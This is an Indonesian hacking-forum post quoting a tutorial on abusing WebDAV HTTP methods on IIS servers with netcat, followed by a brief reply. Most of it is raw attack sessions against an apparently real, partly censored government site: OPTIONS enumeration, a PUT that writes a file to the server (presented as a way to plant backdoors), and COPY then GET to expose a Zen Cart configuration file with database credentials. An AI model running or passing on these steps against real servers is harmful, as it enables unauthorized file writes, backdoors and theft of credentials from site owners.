05-27-2012, 11:29 PM
(02-07-2012, 11:02 AM)NoseTrave Wrote: Assalamualaikum Wr. Wb.
halo backtrackers! gimana kabarnya.. mudah mudahan ngak suram ya ? hehehe.
langsung aja deh, disini nosetrave akan menjelaskan apa itu HTTP ATTACK.
bagi yang udah berpengalaman pasti tau dong apa HTTP ATTACK itu ? bisa dibilang ini adalah metode hacking yang OLD SCHOOL,
sebenarnya ane udah nulis thread ini sampe banyak banget ke bawah, eh tiba tiba browser rollback, dan tara tulisan ane ilang deh, huft cape deh nulis lagi, tapi demi sobat backtrakers semua gak apa dah cape dikit, hehe.
HTTP ATTACK adalah metode menyerang ke HTTP server (web server) dengan melalui HTTP METHOD yang di allow (bukan menyerang dari sisi web apps seperti PHP, ASP, Database, Dan lain lain).
nah kita harus tau dulu apa saja HTTP METHOD.
Code:GET, POST, OPTIONS, TRACE, PUT, DELETE, MOVE, COPY, dan lain lain.
untuk melakukan exploitasi pada metode-metode di atas di butuhkan tools yang bernama NetCat. mungkin bisa juga pakai TELNET, tapi disini kita pake NetCat ya.
di backtrack kalian semua udah terinstall netcat kan ? oke langsung ke prakteknya aja.
pertama fungsi metode http OPTIONS .
sebenarnya fungsi ini tidak berbahaya bagi web server, namun justru metode http ini lah yang membeberkan fungsi-fungsi HTTP METHOD yang di allow. wele wele, langsung aja deh caranya :
note: xxx.go.id adalah sebuah web server yang telah di sensor.Code:root@NoseTrave:~# nc -vv xxx.go.id 80
Warning: inverse host lookup failed for 103.5.148.22: Unknown server error : Connection timed out
xxx.go.id [103.5.148.22] 80 (www) open
OPTIONS / HTTP/1.1
Host: xxx.go.id
HTTP/1.1 200 OK
Date: Mon, 06 Feb 2012 03:58:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private
sent 37, rcvd 406
root@NoseTrave:~#
wops banyak banget yang di allow.
next ke metode berikutnya.
PUT
metode ini sangatlah berbahaya, PUT mengizinkan browser untuk menulis file pada sebuah web server! , jadi dengan kata lain kita bisa menanam backdoor pada sebuah web server tersebut!
langsung aja praktek
wops jadi deh xxx.go.id/malingsendal.txtCode:nc -vv xxx.go.id 80
Warning: inverse host lookup failed for 103.5.148.22: Unknown server error : Connection timed out
xxx.go.id [103.5.148.22] 80 (www) open
PUT /malingsendal.txt HTTP/1.1
Host: xxx.go.id
Content-Length: 18
NoseTrave Wuz Here
HTTP/1.1 201 File saved
Content-Length: 1458
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 06 Feb 2012 04:00:07 GMT
yang perlu di perhatikan adalah bahwa Content-Length harus sama dengan panjang karakter text yang akan di tulis ke server. Dan tentu saja direktori harus permission 777 (writeable).
lanjut.
DELETE
metode DELETE untuk menghapus file pada web server.
lanjut.
COPY
nah metode COPY ini gunanya untuk menyalin file pada web server, misalnya kita mau membaca file config.php, karena didalam file itu terdapat SESUATU.
pada web browser jika kita buka target.com/inc/config.php maka SESUATU nya tidak akan muncul, tapi jika kita memakai memanfaatkan metode COPY ini kita bisa mencopy file config.php menjadi config.txt, sehinga dalam config.txt akan bisa terlihat SESUATUNYA, hehehe.
praktek:
Nah selesai deh, sudah ter copy di target.com/config.txt , tingal di baca aja.Code:root@NoseTrave:~# nc -vv target.com
Warning: inverse host lookup failed for 103.5.148.22: Unknown server error : Connection timed out
target.com [103.5.148.22] 80 (www) open
COPY /inc/configure.php /config.txt HTTP/1.1
Host: target.com
HTTP/1.1 200 OK
Content-Length: 1458
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 06 Feb 2012 04:15:07 GMT
dibaca dengan metode GET
wops, keluar kan SESUATU nya.. hehehe.Code:root@NoseTrave:~# nc -vv target.com
Warning: inverse host lookup failed for 103.5.148.22: Unknown server error : Connection timed out
target.com [103.5.148.22] 80 (www) open
GET /config.txt HTTP/1.1
Host: target.com
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2012 09:30:18 GMT
Server: Microsoft-IIS/6.0
Last-Modified: Mon, 06 Feb 2012 04:20:31 GMT
Accept-Ranges: bytes
Content-Length: 3214
Content-Type: text/plain
<?php
/**
* @package Configuration Settings circa 1.3.8
* @copyright Copyright 2003-2007 Zen Cart Development Team
* @copyright Portions Copyright 2003 osCommerce
* @license http://www.zen-cart.com/license/2_0.txt GNU Public License V2.0
*/
/*************** NOTE: This file is similar, but DIFFERENT from the "admin" version of configure.php. ***********/
/*************** The 2 files should be kept separate and not used to overwrite each other. ***********/
// Define the webserver and path parameters
// HTTP_SERVER is your Main webserver: eg-http://www.your_domain.com
// HTTPS_SERVER is your Secure webserver: eg-https://www.your_domain.com
define('HTTP_SERVER', 'http://www.sasaran.com');
define('HTTPS_SERVER', 'https://www.sasaran.com');
// Use secure webserver for checkout procedure?
define('ENABLE_SSL', 'false');
// NOTE: be sure to leave the trailing '/' at the end of these lines if you make changes!
// * DIR_WS_* = Webserver directories (virtual/URL)
// these paths are relative to top of your webspace ... (ie: under the public_html or httpdocs folder)
define('DIR_WS_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', DIR_WS_CATALOG . 'pub/');
define('DIR_WS_TEMPLATES', DIR_WS_INCLUDES . 'templates/');
define('DIR_WS_PHPBB', '/');
// * DIR_FS_* = Filesystem directories (local/physical)
//the following path is a COMPLETE path to your Zen Cart files. eg: /var/www/vhost/accountname/public_html/store/
define('DIR_FS_CATALOG', '/');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DIR_WS_UPLOADS', DIR_WS_IMAGES . 'uploads/');
define('DIR_FS_UPLOADS', DIR_FS_CATALOG . DIR_WS_UPLOADS);
define('DIR_FS_EMAIL_TEMPLATES', DIR_FS_CATALOG . 'email/');
// define our database connection
define('DB_TYPE', 'mysql');
define('DB_PREFIX', 'dat_');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', '***');
define('DB_SERVER_PASSWORD', '******************4');
define('DB_DATABASE', 'dat_*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'db');
// for STORE_SESSIONS,
use 'db' for best support, or '' for file-based storage
// The next 2 "defines" are for SQL cache support.
// For SQL_CACHE_METHOD, you can select from: none, database, or file
// If you choose "file", then you need to set the DIR_FS_SQL_CACHE to a directory where your apache
// or webserver user has write privileges (chmod 666 or 777). We recommend using the "cache" folder inside the Zen Cart folder
// ie: /path/to/your/webspace/public_html/zen/cache -- leave no trailing slash
define('SQL_CACHE_METHOD', 'database');
define('DIR_FS_SQL_CACHE', '/cache');
// EOF
sekian dari NoseTrave semoga bermanfaat, jika kurang jelas tutor dari saya silakan kunjungi sumber dimana saya belajar, hehehe.
Corect me if im worng.
http://explorecrew.org/portal.php?page=r...t=2&ID=264
Om, saya coba ke https kok tidak bisa om??
Apa ini hanya support http standart ya om??
